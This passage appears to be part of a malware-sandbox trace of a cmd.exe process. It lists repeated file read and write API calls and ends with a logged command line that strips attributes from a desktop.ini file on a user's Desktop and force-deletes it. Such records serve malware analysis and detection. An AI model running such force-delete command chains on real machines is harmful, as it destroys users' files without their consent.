lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.235] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.236] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.238] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.239] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.241] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.242] GetFileType (hFile=0x4c) returned 0x1 [0225.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.242] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.405] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.406] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.406] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.407] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.407] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x32, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x32, lpOverlapped=0x0) returned 1 [0225.408] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.408] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.408] _close (_FileHandle=4) returned 0 [0225.408] FindNextFileW (in: hFindFile=0x410e60, lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0 [0225.408] GetLastError () returned 0x12 [0225.408] FindClose (in: hFindFile=0x410e60 | out: hFindFile=0x410e60) returned 1 [0225.409] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0225.409] _close (_FileHandle=3) returned 0 [0225.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.410] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.410] SetConsoleInputExeNameW () returned 0x1 [0225.410] GetConsoleOutputCP () returned 0x1b5 [0225.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.410] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.410] exit (_Code=0) Process: id = "595" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xc84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type 